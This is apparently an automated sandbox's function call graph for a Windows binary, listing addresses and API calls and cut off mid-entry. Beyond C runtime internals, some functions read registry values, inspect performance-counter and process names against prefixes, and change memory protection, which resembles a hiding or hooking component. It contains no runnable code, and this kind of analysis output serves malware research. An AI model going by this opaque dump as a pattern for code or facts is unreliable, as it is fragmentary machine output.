13f08e6d2a0 __free_lconv_num 13 API calls 16416->16417 16417->16413 16418->16418 16450 13f08e6e8e0 16418->16450 16421 13f08e6e6b2 16422 13f08e6d1f4 __std_exception_copy 13 API calls 16421->16422 16424 13f08e6e6b7 16422->16424 16423 13f08e6e70d 16426 13f08e6e774 16423->16426 16461 13f08e6e05c 16423->16461 16427 13f08e6d2a0 __free_lconv_num 13 API calls 16424->16427 16425 13f08e6e6cc 16425->16423 16428 13f08e6d2a0 __free_lconv_num 13 API calls 16425->16428 16430 13f08e6d2a0 __free_lconv_num 13 API calls 16426->16430 16427->16413 16428->16423 16430->16413 16432 13f08e6e7cf 16431->16432 16438 13f08e6e7d9 16432->16438 16476 13f08e6c558 EnterCriticalSection 16432->16476 16439 13f08e6e571 16438->16439 16440 13f08e6cacc 14 API calls 16438->16440 16443 13f08e6e22c 16439->16443 16441 13f08e6e8a0 16440->16441 16442 13f08e6e53c 56 API calls 16441->16442 16442->16439 16444 13f08e6dd78 14 API calls 16443->16444 16445 13f08e6e240 16444->16445 16446 13f08e6e25e 16445->16446 16447 13f08e6e24c GetOEMCP 16445->16447 16448 13f08e6e263 GetACP 16446->16448 16449 13f08e6e273 16446->16449 16447->16449 16448->16449 16449->16413 16449->16414 16451 13f08e6e22c 16 API calls 16450->16451 16452 13f08e6e91b 16451->16452 16453 13f08e6ea71 16452->16453 16455 13f08e6e958 IsValidCodePage 16452->16455 16460 13f08e6e972 16452->16460 16454 13f08e68070 _invalid_parameter_noinfo 8 API calls 16453->16454 16456 13f08e6e6a9 16454->16456 16455->16453 16457 13f08e6e969 16455->16457 16456->16421 16456->16425 16458 13f08e6e998 GetCPInfo 16457->16458 16457->16460 16458->16453 16458->16460 16477 13f08e6e344 16460->16477 16550 13f08e6c558 EnterCriticalSection 16461->16550 16478 13f08e6e38f GetCPInfo 16477->16478 16479 13f08e6e485 16477->16479 16478->16479 16485 13f08e6e3a2 16478->16485 16480 13f08e68070 _invalid_parameter_noinfo 8 API calls 16479->16480 16481 13f08e6e524 16480->16481 16481->16453 16488 13f08e71474 16485->16488 16487 13f08e71938 33 API calls 16487->16479 16489 13f08e6dd78 14 API calls 16488->16489 16490 13f08e714b6 16489->16490 16491 13f08e6ec58 MultiByteToWideChar 16490->16491 16493 13f08e714ec 16491->16493 16492 13f08e714f3 16495 13f08e68070 _invalid_parameter_noinfo 8 API calls 16492->16495 16493->16492 16494 13f08e6c5d0 14 API calls 16493->16494 16497 13f08e715b0 16493->16497 16499 13f08e7151c 16493->16499 16494->16499 16496 13f08e6e419 16495->16496 16503 13f08e71938 16496->16503 16497->16492 16498 13f08e6d2a0 __free_lconv_num 13 API calls 16497->16498 16498->16492 16499->16497 16500 13f08e6ec58 MultiByteToWideChar 16499->16500 16501 13f08e71592 16500->16501 16501->16497 16502 13f08e71596 GetStringTypeW 16501->16502 16502->16497 16504 13f08e6dd78 14 API calls 16503->16504 16505 13f08e7195d 16504->16505 16508 13f08e71604 16505->16508 16509 13f08e71645 16508->16509 16510 13f08e6ec58 MultiByteToWideChar 16509->16510 16513 13f08e7168f 16510->16513 16511 13f08e7190d 16512 13f08e68070 _invalid_parameter_noinfo 8 API calls 16511->16512 16514 13f08e6e44c 16512->16514 16513->16511 16515 13f08e6c5d0 14 API calls 16513->16515 16517 13f08e716c7 16513->16517 16528 13f08e717c5 16513->16528 16514->16487 16515->16517 16516 13f08e6d2a0 __free_lconv_num 13 API calls 16516->16511 16518 13f08e6ec58 MultiByteToWideChar 16517->16518 16517->16528 16519 13f08e7173a 16518->16519 16519->16528 16539 13f08e6f218 16519->16539 16521 13f08e7176d 16522 13f08e717d6 16521->16522 16523 13f08e71785 16521->16523 16521->16528 16524 13f08e6c5d0 14 API calls 16522->16524 16526 13f08e718a8 16522->16526 16527 13f08e717f4 16522->16527 16525 13f08e6f218 10 API calls 16523->16525 16523->16528 16524->16527 16525->16528 16526->16528 16529 13f08e6d2a0 __free_lconv_num 13 API calls 16526->16529 16527->16528 16530 13f08e6f218 10 API calls 16527->16530 16528->16511 16528->16516 16529->16528 16531 13f08e71874 16530->16531 16531->16526 16532 13f08e71894 16531->16532 16533 13f08e718aa 16531->16533 16534 13f08e6ece8 WideCharToMultiByte 16532->16534 16535 13f08e6ece8 WideCharToMultiByte 16533->16535 16536 13f08e718a2 16534->16536 16535->16536 16536->16526 16537 13f08e718c2 16536->16537 16537->16528 16538 13f08e6d2a0 __free_lconv_num 13 API calls 16537->16538 16538->16528 16540 13f08e6f244 16539->16540 16541 13f08e6f267 16539->16541 16544 13f08e6ef88 9 API calls 16540->16544 16545 13f08e6f26f 16540->16545 16541->16545 16546 13f08e6f30c 16541->16546 16543 13f08e6f2cd LCMapStringW 16543->16545 16544->16541 16545->16521 16547 13f08e6f34a 16546->16547 16548 13f08e6f328 16546->16548 16547->16543 16548->16547 16549 13f08e6ef88 9 API calls 16548->16549 16549->16547 16570 13f08e6d1d0 16551->16570 16553 13f08e6d191 __free_lconv_num 16554 13f08e6d1f4 __std_exception_copy 13 API calls 16553->16554 16555 13f08e6d1a1 16554->16555 16555->16390 16557 13f08e6de5b 16556->16557 16562 13f08e6de40 16556->16562 16558 13f08e6de60 16557->16558 16559 13f08e6ece8 WideCharToMultiByte 16557->16559 16561 13f08e6d1f4 __std_exception_copy 13 API calls 16558->16561 16558->16562 16560 13f08e6deb7 16559->16560 16560->16558 16563 13f08e6debe GetLastError 16560->16563 16564 13f08e6dee9 16560->16564 16561->16562 16562->16390 16565 13f08e6d184 13 API calls 16563->16565 16566 13f08e6ece8 WideCharToMultiByte 16564->16566 16567 13f08e6decb 16565->16567 16568 13f08e6df10 16566->16568 16569 13f08e6d1f4 __std_exception_copy 13 API calls 16567->16569 16568->16562 16568->16563 16569->16562 16571 13f08e6cb10 __std_exception_copy 13 API calls 16570->16571 16572 13f08e6d1d9 16571->16572 16572->16553 16574 13f08e6eba8 16573->16574 16575 13f08e6dd78 14 API calls 16574->16575 16576 13f08e6ebcc 16575->16576 16576->16399 18269 13f08e65fcc 18270 13f08e65fd3 18269->18270 18271 13f08e66000 VirtualProtect 18270->18271 18273 13f08e65f10 18270->18273 18272 13f08e66029 GetLastError 18271->18272 18271->18273 18272->18273 15075 13f08e91bc4 15082 13f08e91724 GetProcessHeap HeapAlloc 15075->15082 15077 13f08e91bd3 15078 13f08e91bda SleepEx 15077->15078 15081 13f08e9159c StrCmpIW StrCmpW 15077->15081 15133 13f08e919b0 15077->15133 15079 13f08e91724 50 API calls 15078->15079 15079->15077 15081->15077 15150 13f08e91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15082->15150 15084 13f08e9174c 15151 13f08e91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15084->15151 15086 13f08e91754 15152 13f08e91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15086->15152 15088 13f08e9175d 15153 13f08e91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15088->15153 15090 13f08e91766 15154 13f08e91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15090->15154 15092 13f08e9176f 15155 13f08e91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15092->15155 15094 13f08e91778 15156 13f08e91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15094->15156 15096 13f08e91781 15157 13f08e91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15096->15157 15098 13f08e9178a RegOpenKeyExW 15099 13f08e917bc RegOpenKeyExW 15098->15099 15100 13f08e919a2 15098->15100 15101 13f08e917fb RegOpenKeyExW 15099->15101 15102 13f08e917e5 15099->15102 15100->15077 15104 13f08e9181f 15101->15104 15105 13f08e91836 RegOpenKeyExW 15101->15105 15158 13f08e912b8 RegQueryInfoKeyW 15102->15158 15167 13f08e9104c RegQueryInfoKeyW 15104->15167 15108 13f08e9185a 15105->15108 15109 13f08e91871 RegOpenKeyExW 15105->15109 15111 13f08e912b8 16 API calls 15108->15111 15112 13f08e918ac RegOpenKeyExW 15109->15112 15113 13f08e91895 15109->15113 15116 13f08e91867 RegCloseKey 15111->15116 15114 13f08e918e7 RegOpenKeyExW 15112->15114 15115 13f08e918d0 15112->15115 15117 13f08e912b8 16 API calls 15113->15117 15119 13f08e9190b 15114->15119 15120 13f08e91922 RegOpenKeyExW 15114->15120 15118 13f08e912b8 16 API calls 15115->15118 15116->15109 15121 13f08e918a2 RegCloseKey 15117->15121 15122 13f08e918dd RegCloseKey 15118->15122 15123 13f08e9104c 6 API calls 15119->15123 15124 13f08e9195d RegOpenKeyExW 15120->15124 15125 13f08e91946 15120->15125 15121->15112 15122->15114 15126 13f08e91918 RegCloseKey 15123->15126 15128 13f08e91998 RegCloseKey 15124->15128 15129 13f08e91981 15124->15129 15127 13f08e9104c 6 API calls 15125->15127 15126->15120 15130 13f08e91953 RegCloseKey 15127->15130 15128->15100 15131 13f08e9104c 6 API calls 15129->15131 15130->15124 15132 13f08e9198e RegCloseKey 15131->15132 15132->15128 15177 13f08e914a0 15133->15177 15150->15084 15151->15086 15152->15088 15153->15090 15154->15092 15155->15094 15156->15096 15157->15098 15159 13f08e91323 GetProcessHeap HeapAlloc 15158->15159 15160 13f08e91486 RegCloseKey 15158->15160 15161 13f08e9134e RegEnumValueW 15159->15161 15162 13f08e91472 GetProcessHeap HeapFree 15159->15162 15160->15101 15163 13f08e913a1 15161->15163 15162->15160 15163->15161 15163->15162 15165 13f08e9141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15163->15165 15166 13f08e913cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15163->15166 15172 13f08e91530 15163->15172 15165->15163 15166->15165 15168 13f08e910bf 15167->15168 15169 13f08e911b5 RegCloseKey 15167->15169 15168->15169 15170 13f08e910cf RegEnumValueW 15168->15170 15171 13f08e9114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15168->15171 15169->15105 15170->15168 15171->15168 15173 13f08e91580 15172->15173 15176 13f08e9154a 15172->15176 15173->15163 15174 13f08e91569 StrCmpW 15174->15176 15175 13f08e91561 StrCmpIW 15175->15176 15176->15173 15176->15174 15176->15175 15178 13f08e914e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15177->15178 15179 13f08e914c2 GetProcessHeap HeapFree 15177->15179 15179->15178 15179->15179 18608 13f08e6b0d4 18610 13f08e6b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 18608->18610 18609 13f08e6b0fb 18611 13f08e69324 __CxxCallCatchBlock 9 API calls 18609->18611 18610->18609 18612 13f08e6b10b __FrameHandler3::GetHandlerSearchState 18610->18612 18615 13f08e699cc 9 API calls Is_bad_exception_allowed 18610->18615 18616 13f08e699f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 18610->18616 18613 13f08e6b100 18611->18613 18613->18612 18614 13f08e69324 __CxxCallCatchBlock 9 API calls 18613->18614 18614->18612 18615->18610 18616->18610 16839 13f08e719d0 16840 13f08e6e864 56 API calls 16839->16840 16841 13f08e719d9 16840->16841 17367 13f08e6f6dc 17370 13f08e6f6e8 17367->17370 17369 13f08e6f70f 17370->17369 17371 13f08e71c0c 17370->17371 17372 13f08e71c11 17371->17372 17373 13f08e71c4c 17371->17373 17374 13f08e71c44 17372->17374 17375 13f08e71c32 DeleteCriticalSection 17372->17375 17373->17370 17376 13f08e6d2a0 __free_lconv_num 13 API calls 17374->17376 17375->17374 17375->17375 17376->17373 16845 13f08e625dc 16846 13f08e6265a 16845->16846 16847 13f08e626bf GetFileType 16846->16847 16852 13f08e62777 16846->16852 16848 13f08e626e1 16847->16848 16849 13f08e626cd StrCpyW 16847->16849 16856 13f08e61ad4 GetFinalPathNameByHandleW 16848->16856 16854 13f08e626ee 16849->16854 16854->16852 16861 13f08e63f88 16854->16861 16864 13f08e63708 StrCmpIW 16854->16864 16868 13f08e61dd4 16854->16868 16857 13f08e61b3d 16856->16857 16858 13f08e61afe StrCmpNIW 16856->16858 16857->16854 16858->16857 16859 13f08e61b18 lstrlenW 16858->16859 16859->16857 16860 13f08e61b2a StrCpyW 16859->16860 16860->16857 16862 13f08e63f95 StrCmpNIW 16861->16862 16863 13f08e63faa 16861->16863 16862->16863 16863->16854 16865 13f08e63751 PathCombineW 16864->16865 16866 13f08e6373a StrCpyW StrCatW 16864->16866 16867 13f08e6375a 16865->16867 16866->16867 16867->16854 16869 13f08e61df4 16868->16869 16870 13f08e61deb 16868->16870 16869->16854 16871 13f08e61530 2 API calls 16870->16871 16871->16869 16872 13f08e6c1d8 16873 13f08e6c1f1 16872->16873 16874 13f08e6c209 16872->16874 16873->16874 16875 13f08e6d2a0 __free_lconv_num 13 API calls 16873->16875 16875->16874 17593 13f08e6aaac 17594 13f08e6aad9 __except_validate_context_record 17593->17594 17595 13f08e69324 __CxxCallCatchBlock 9 API calls 17594->17595 17596 13f08e6aade 17595->17596 17598 13f08e6ab38 17596->17598 17601 13f08e6abc6 17596->17601 17607 13f08e6ab8c 17596->17607 17597 13f08e6ac34 17597->17607 17635 13f08e6a22c 17597->17635 17599 13f08e6abb3 17598->17599 17598->17607 17608 13f08e6ab5a __GetCurrentState 17598->17608 17622 13f08e695d0 17599->17622 17604 13f08e6abe5 17601->17604 17629 13f08e699cc 17601->17629 17604->17597 17604->17607 17632 13f08e699e0 17604->17632 17605 13f08e6acdd 17608->17605 17610 13f08e6afb8 17608->17610 17611 13f08e699cc Is_bad_exception_allowed 9 API calls 17610->17611 17612 13f08e6afe7 __GetCurrentState 17611->17612 17613 13f08e69324 __CxxCallCatchBlock 9 API calls 17612->17613 17617 13f08e6b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 17613->17617 17614 13f08e6b0fb 17615 13f08e69324 __CxxCallCatchBlock 9 API calls 17614->17615 17616 13f08e6b100 17615->17616 17618 13f08e69324 __CxxCallCatchBlock 9 API calls 17616->17618 17619 13f08e6b10b __FrameHandler3::GetHandlerSearchState 17616->17619 17617->17614 17617->17619 17620 13f08e699cc 9 API calls Is_bad_exception_allowed 17617->17620 17692 13f08e699f4 17617->17692 17618->17619 17619->17607 17620->17617 17695 13f08e69634 17622->17695 17624 13f08e695ef __FrameHandler3::FrameUnwindToEmptyState 17699 13f08e69540 17624->17699 17627 13f08e6afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17628 13f08e69624 17627->17628 17628->17607 17630 13f08e69324 __CxxCallCatchBlock 9 API calls 17629->17630 17631 13f08e699d5 17630->17631 17631->17604 17633 13f08e69324 __CxxCallCatchBlock 9 API calls 17632->17633 17634 13f08e699e9 17633->17634 17634->17597 17703 13f08e6b144 17635->17703 17637 13f08e6a6f4 17638 13f08e6a645 17638->17637 17679 13f08e6a643 17638->17679 17756 13f08e6a6fc 17638->17756 17639 13f08e6a373 17639->17638 17673 13f08e6a3ab 17639->17673 17640 13f08e69324 __CxxCallCatchBlock 9 API calls 17643 13f08e6a687 17640->17643 17643->17637 17647 13f08e68070 _invalid_parameter_noinfo 8 API calls 17643->17647 17644 13f08e6a575 17648 13f08e6a592 17644->17648 17651 13f08e699cc Is_bad_exception_allowed 9 API calls 17644->17651 17644->17679 17645 13f08e69324 __CxxCallCatchBlock 9 API calls 17646 13f08e6a2da 17645->17646 17646->17643 17649 13f08e69324 __CxxCallCatchBlock 9 API calls 17646->17649 17650 13f08e6a69a 17647->17650 17654 13f08e6a5b4 17648->17654 17648->17679 17749 13f08e695a4 17648->17749 17653 13f08e6a2ea 17649->17653 17650->17607 17651->17648 17655 13f08e69324 __CxxCallCatchBlock 9 API calls 17653->17655 17656 13f08e6a5ca 17654->17656 17654->17679 17689 13f08e6a6d7 17654->17689 17657 13f08e6a2f3 17655->17657 17658 13f08e6a5d5 17656->17658 17661 13f08e699cc Is_bad_exception_allowed 9 API calls 17656->17661 17714 13f08e69a0c 17657->17714 17665 13f08e6b1dc 9 API calls 17658->17665 17659 13f08e69324 __CxxCallCatchBlock 9 API calls 17662 13f08e6a6dd 17659->17662 17661->17658 17664 13f08e69324 __CxxCallCatchBlock 9 API calls 17662->17664 17667 13f08e6a6e6 17664->17667 17668 13f08e6a5eb 17665->17668 17666 13f08e699e0 9 API calls 17666->17673 17670 13f08e6c2f4 14 API calls 17667->17670 17672 13f08e69634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 17668->17672 17668->17679 17669 13f08e69324 __CxxCallCatchBlock 9 API calls 17671 13f08e6a335 17669->17671 17670->17637 17671->17639 17675 13f08e69324 __CxxCallCatchBlock 9 API calls 17671->17675 17674 13f08e6a605 17672->17674 17673->17644 17673->17666 17728 13f08e6a96c 17673->17728 17742 13f08e6a158 17673->17742 17753 13f08e69838 RtlUnwindEx 17674->17753 17677 13f08e6a341 17675->17677 17678 13f08e69324 __CxxCallCatchBlock 9 API calls 17677->17678 17680 13f08e6a34a 17678->17680 17679->17640 17717 13f08e6b1dc 17680->17717 17685 13f08e6a35e 17724 13f08e6b2cc 17685->17724 17687 13f08e6a6d1 17688 13f08e6c2f4 14 API calls 17687->17688 17688->17689 17689->17659 17690 13f08e6a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 17690->17687 17691 13f08e69178 Concurrency::cancel_current_task 2 API calls 17690->17691 17691->17687 17693 13f08e69324 __CxxCallCatchBlock 9 API calls 17692->17693 17694 13f08e69a02 17693->17694 17694->17617 17698 13f08e69662 __FrameHandler3::FrameUnwindToEmptyState 17695->17698 17696 13f08e696d4 17696->17624 17697 13f08e6968c RtlLookupFunctionEntry 17697->17698 17698->17696 17698->17697 17700 13f08e6958b 17699->17700 17702 13f08e69560 17699->17702 17700->17627 17701 13f08e69324 __CxxCallCatchBlock 9 API calls 17701->17702 17702->17700 17702->17701 17704 13f08e6b169 __FrameHandler3::FrameUnwindToEmptyState 17703->17704 17705 13f08e69634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 17704->17705 17706 13f08e6b17e 17705->17706 17768 13f08e69db4 17706->17768 17709 13f08e6b1b3 17711 13f08e69db4 __GetUnwindTryBlock RtlLookupFunctionEntry 17709->17711 17710 13f08e6b190 __FrameHandler3::GetHandlerSearchState 17771 13f08e69dec 17710->17771 17712 13f08e6a28e 17711->17712 17712->17637 17712->17639 17712->17645 17715 13f08e69324 __CxxCallCatchBlock 9 API calls 17714->17715 17716 13f08e69a1a 17715->17716 17716->17637 17716->17669 17720 13f08e6b2c3 17717->17720 17721 13f08e6b207 17717->17721 17718 13f08e6a35a 17718->17639 17718->17685 17719 13f08e699e0 9 API calls 17719->17721 17721->17718 17721->17719 17722 13f08e699cc Is_bad_exception_allowed 9 API calls 17721->17722 17723 13f08e6a96c 9 API calls 17721->17723 17722->17721 17723->17721 17725 13f08e6b339 17724->17725 17727 13f08e6b2e9 Is_bad_exception_allowed 17724->17727 17725->17690 17726 13f08e699cc 9 API calls Is_bad_exception_allowed 17726->17727 17727->17725 17727->17726 17729 13f08e6a999 17728->17729 17741 13f08e6aa28 17728->17741 17730 13f08e699cc Is_bad_exception_allowed 9 API calls 17729->17730 17731 13f08e6a9a2 17730->17731 17732 13f08e699cc Is_bad_exception_allowed 9 API calls 17731->17732 17733 13f08e6a9bb 17731->17733 17731->17741 17732->17733 17734 13f08e6a9e7 17733->17734 17735 13f08e699cc Is_bad_exception_allowed 9 API calls 17733->17735 17733->17741 17736 13f08e699e0 9 API calls 17734->17736 17735->17734 17737 13f08e6a9fb 17736->17737 17738 13f08e699cc Is_bad_exception_allowed 9 API calls 17737->17738 17739 13f08e6aa14 17737->17739 17737->17741 17738->17739 17740 13f08e699e0 9 API calls 17739->17740 17740->17741 17741->17673 17743 13f08e69634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 17742->17743 17744 13f08e6a195 17743->17744 17745 13f08e699cc Is_bad_exception_allowed 9 API calls 17744->17745 17746 13f08e6a1cd 17745->17746 17747 13f08e69838 9 API calls 17746->17747 17748 13f08e6a211 17747->17748 17748->17673 17750 13f08e695b8 __FrameHandler3::FrameUnwindToEmptyState 17749->17750 17751 13f08e69540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17750->17751 17752 13f08e695c2 17751->17752 17752->17654 17754 13f08e68070 _invalid_parameter_noinfo 8 API calls 17753->17754 17755 13f08e69932 17754->17755 17755->17679 17757 13f08e6a735 17756->17757 17758 13f08e6a948 17756->17758 17759 13f08e69324 __CxxCallCatchBlock 9 API calls 17757->17759 17758->17679 17760 13f08e6a73a 17759->17760 17761 13f08e6a759 EncodePointer 17760->17761 17767 13f08e6a7ac 17760->17767 17762 13f08e69324 __CxxCallCatchBlock 9 API calls 17761->17762 17763 13f08e6a769 17762->17763 17763->17767 17774 13f08e694ec 17763->17774 17765 13f08e699cc 9 API calls Is_bad_exception_allowed 17765->17767 17766 13f08e6a158 19 API calls 17766->17767 17767->17758 17767->17765 17767->17766 17769 13f08e69634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 17768->17769 17770 13f08e69dc7 17769->17770 17770->17709 17770->17710 17772 13f08e69634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 17771->17772 17773 13f08e69e06 17772->17773 17773->17712 17775 13f08e69324 __CxxCallCatchBlock 9 API calls 17774->17775 17776 13f08e69518 17775->17776 17776->17767 18303 13f08e70fa8 18304 13f08e70fcc 18303->18304 18305 13f08e68070 _invalid_parameter_noinfo 8 API calls 18304->18305 18306 13f08e7100e 18305->18306 18307 13f08e633a8 18308 13f08e633cf 18307->18308 18309 13f08e6349c 18308->18309 18310 13f08e633ec PdhGetCounterInfoW 18308->18310 18310->18309 18311 13f08e6340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 18310->18311 18312 13f08e63440 StrCmpW 18311->18312 18313 13f08e63488 GetProcessHeap HeapFree 18311->18313 18312->18313 18314 13f08e63455 18312->18314 18313->18309 18314->18313 18316 13f08e63950 StrCmpNW 18314->18316 18317 13f08e63982 StrStrW 18316->18317 18318 13f08e639f2 18316->18318 18317->18318 18319 13f08e6399b StrToIntW 18317->18319 18318->18314 18319->18318 18320 13f08e639c3 18319->18320 18320->18318 18326 13f08e61a30 OpenProcess 18320->18326 18323 13f08e63f88 StrCmpNIW 18324 13f08e639e4 18323->18324 18324->18318 18325 13f08e61cfc 2 API calls 18324->18325 18325->18318 18327 13f08e61ab6 18326->18327 18328 13f08e61a64 K32GetModuleFileNameExW 18326->18328 18327->18318 18327->18323 18329 13f08e61aad CloseHandle 18328->18329 18330 13f08e61a7e PathFindFileNameW lstrlenW 18328->18330 18329->18327 18330->18329 18331 13f08e61a9c StrCpyW 18330->18331 18331->18329 17800 13f08e62ab4 TlsGetValue TlsGetValue TlsGetValue 17801 13f08e62b0d 17800->17801 17806 13f08e62b79 17800->17806 17803 13f08e62b15 17801->17803 17801->17806 17802 13f08e62b74 17803->17802 17804 13f08e62c32 TlsSetValue TlsSetValue TlsSetValue 17803->17804 17805 13f08e63f88 StrCmpNIW 17803->17805 17804->17802 17805->17803 17806->17802 17806->17804 17807 13f08e63f88 StrCmpNIW 17806->17807 17807->17806 18635 13f08e634b8 18636 13f08e634e8 18635->18636 18637 13f08e635a1 18636->18637 18638 13f08e63505 PdhGetCounterInfoW 18636->18638 18638->18637 18639 13f08e63523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 18638->18639 18640 13f08e63555 StrCmpW 18639->18640 18641 13f08e6358d GetProcessHeap HeapFree 18639->18641 18640->18641 18643 13f08e6356a 18640->18643 18641->18637 18642 13f08e63950 12 API calls 18642->18643 18643->18641 18643->18642 16876 13f08e6c180 16879 13f08e6bf38 16876->16879 16886 13f08e6bf00 16879->16886 16887 13f08e6bf15 16886->16887 16888 13f08e6bf10 16886->16888 16890 13f08e6bf1c 16887->16890 16889 13f08e6bebc 13 API calls 16888->16889 16889->16887 16891 13f08e6bf31 16890->16891 16892 13f08e6bf2c 16890->16892 16894 13f08e6bebc 16891->16894 16893 13f08e6bebc 13 API calls 16892->16893 16893->16891 16895 13f08e6bec1 16894->16895 16899 13f08e6bef2 16894->16899 16896 13f08e6beea 16895->16896 16897 13f08e6d2a0 __free_lconv_num 13 API calls 16895->16897 16898 13f08e6d2a0 __free_lconv_num 13 API calls 16896->16898 16897->16895 16898->16899 18658 13f08e65c8d 18660 13f08e65c94 18658->18660 18659 13f08e65cfb 18660->18659 18661 13f08e65d77 VirtualProtect 18660->18661 18662 13f08e65da3 GetLastError 18661->18662 18663 13f08e65db1 18661->18663 18662->18663 18348 13f08e7479d 18351 13f08e6af34 18348->18351 18352 13f08e6af9b 18351->18352 18353 13f08e6af4e 18351->18353 18353->18352 18354 13f08e69324 __CxxCallCatchBlock 9 API calls 18353->18354 18354->18352 18355 13f08e71398 18356 13f08e713ae 18355->18356 18357 13f08e713f5 18356->18357 18359 13f08e7140e 18356->18359 18358 13f08e6d1f4 __std_exception_copy 13 API calls 18357->18358 18360 13f08e713fa 18358->18360 18361 13f08e71405 18359->18361 18363 13f08e6dd78 14 API calls 18359->18363 18362 13f08e6d04c _invalid_parameter_noinfo 38 API calls 18360->18362 18362->18361 18363->18361 18364 13f08e62f64 18366 13f08e62fc1 18364->18366 18365 13f08e62fdc 18366->18365 18367 13f08e638a8 3 API calls 18366->18367 18367->18365 16924 13f08e73960 16934 13f08e68ca0 16924->16934 16926 13f08e73988 16928 13f08e69324 __CxxCallCatchBlock 9 API calls 16929 13f08e73998 16928->16929 16930 13f08e69324 __CxxCallCatchBlock 9 API calls 16929->16930 16931 13f08e739a1 16930->16931 16938 13f08e6c2f4 16931->16938 16935 13f08e68cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 16934->16935 16936 13f08e68dd1 16935->16936 16937 13f08e68d94 RtlUnwindEx 16935->16937 16936->16926 16936->16928 16937->16935 16939 13f08e6cab0 _invalid_parameter_noinfo 14 API calls 16938->16939 16940 13f08e6c2fd 16939->16940 17816 13f08e7465f 17817 13f08e74677 17816->17817 17823 13f08e746e2 17816->17823 17818 13f08e69324 __CxxCallCatchBlock 9 API calls 17817->17818 17817->17823 17819 13f08e746c4 17818->17819 17820 13f08e69324 __CxxCallCatchBlock 9 API calls 17819->17820 17821 13f08e746d9 17820->17821 17822 13f08e6c2f4 14 API calls 17821->17822 17822->17823 18368 13f08e67f60 18369 13f08e67f81 18368->18369 18370 13f08e67f7c 18368->18370 18372 13f08e68090 18370->18372 18373 13f08e680b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 18372->18373 18374 13f08e68127 18372->18374 18373->18374 18374->18369 16958 13f08e65974 16959 13f08e6597a 16958->16959 16970 13f08e67fa0 16959->16970 16963 13f08e659de 16965 13f08e65a77 16965->16963 16967 13f08e65bfd 16965->16967 16983 13f08e67b80 16965->16983 16966 13f08e65cfb 16967->16966 16968 13f08e65d77 VirtualProtect 16967->16968 16968->16963 16969 13f08e65da3 GetLastError 16968->16969 16969->16963 16971 13f08e67fab 16970->16971 16972 13f08e659bd 16971->16972 16973 13f08e6b470 _invalid_parameter_noinfo 2 API calls 16971->16973 16974 13f08e67fca 16971->16974 16972->16963 16979 13f08e64400 16972->16979 16973->16971 16975 13f08e67fd5 16974->16975 16989 13f08e687b8 16974->16989 16993 13f08e687d8 16975->16993 16980 13f08e6441d 16979->16980 16982 13f08e6448c 16980->16982 17002 13f08e64670 16980->17002 16982->16965 16984 13f08e67bc7 16983->16984 17027 13f08e67950 16984->17027 16987 13f08e68070 _invalid_parameter_noinfo 8 API calls 16988 13f08e67bf1 16987->16988 16988->16965 16990 13f08e687c6 std::bad_alloc::bad_alloc 16989->16990 16997 13f08e69178 16990->16997 16992 13f08e687d7 16994 13f08e687e6 std::bad_alloc::bad_alloc 16993->16994 16995 13f08e69178 Concurrency::cancel_current_task 2 API calls 16994->16995 16996 13f08e67fdb 16995->16996 16998 13f08e69197 16997->16998 16999 13f08e691e2 RaiseException 16998->16999 17000 13f08e691c0 RtlPcToFileHeader 16998->17000 16999->16992 17001 13f08e691d8 17000->17001 17001->16999 17003 13f08e64694 17002->17003 17004 13f08e646b7 17002->17004 17003->17004 17016 13f08e64120 17003->17016 17007 13f08e646ed 17004->17007 17022 13f08e64250 17004->17022 17009 13f08e64250 2 API calls 17007->17009 17013 13f08e6471d 17007->17013 17008 13f08e64753 17010 13f08e6476f 17008->17010 17011 13f08e64120 3 API calls 17008->17011 17009->17013 17012 13f08e6478b 17010->17012 17015 13f08e64250 2 API calls 17010->17015 17011->17010 17012->16982 17013->17008 17014 13f08e64120 3 API calls 17013->17014 17014->17008 17015->17012 17017 13f08e64141 17016->17017 17018 13f08e64196 VirtualQuery 17017->17018 17019 13f08e641b0 17017->17019 17020 13f08e641ca VirtualAlloc 17017->17020 17018->17017 17018->17019 17019->17004 17020->17019 17021 13f08e641fb GetLastError 17020->17021 17021->17017 17025 13f08e64268 17022->17025 17023 13f08e642d7 17023->17007 17024 13f08e642bd VirtualQuery 17024->17023 17024->17025 17025->17023 17025->17024 17026 13f08e64322 GetLastError 17025->17026 17026->17023 17026->17025 17028 13f08e6796b 17027->17028 17029 13f08e67981 SetLastError 17028->17029 17030 13f08e6798f 17028->17030 17029->17030 17030->16987 17832 13f08e68672 17833 13f08e690c0 __std_exception_copy 38 API calls 17832->17833 17834 13f08e6869d 17833->17834 18386 13f08e6f370 VirtualProtect 18672 13f08e6f870 18673 13f08e6f8a0 18672->18673 18674 13f08e6f8c7 18672->18674 18673->18674 18675 13f08e6cb10 __std_exception_copy 13 API calls 18673->18675 18678 13f08e6f8b4 18673->18678 18676 13f08e6f99c 18674->18676 18695 13f08e6c558 EnterCriticalSection 18674->18695 18675->18678 18680 13f08e6f9ca 18676->18680 18681 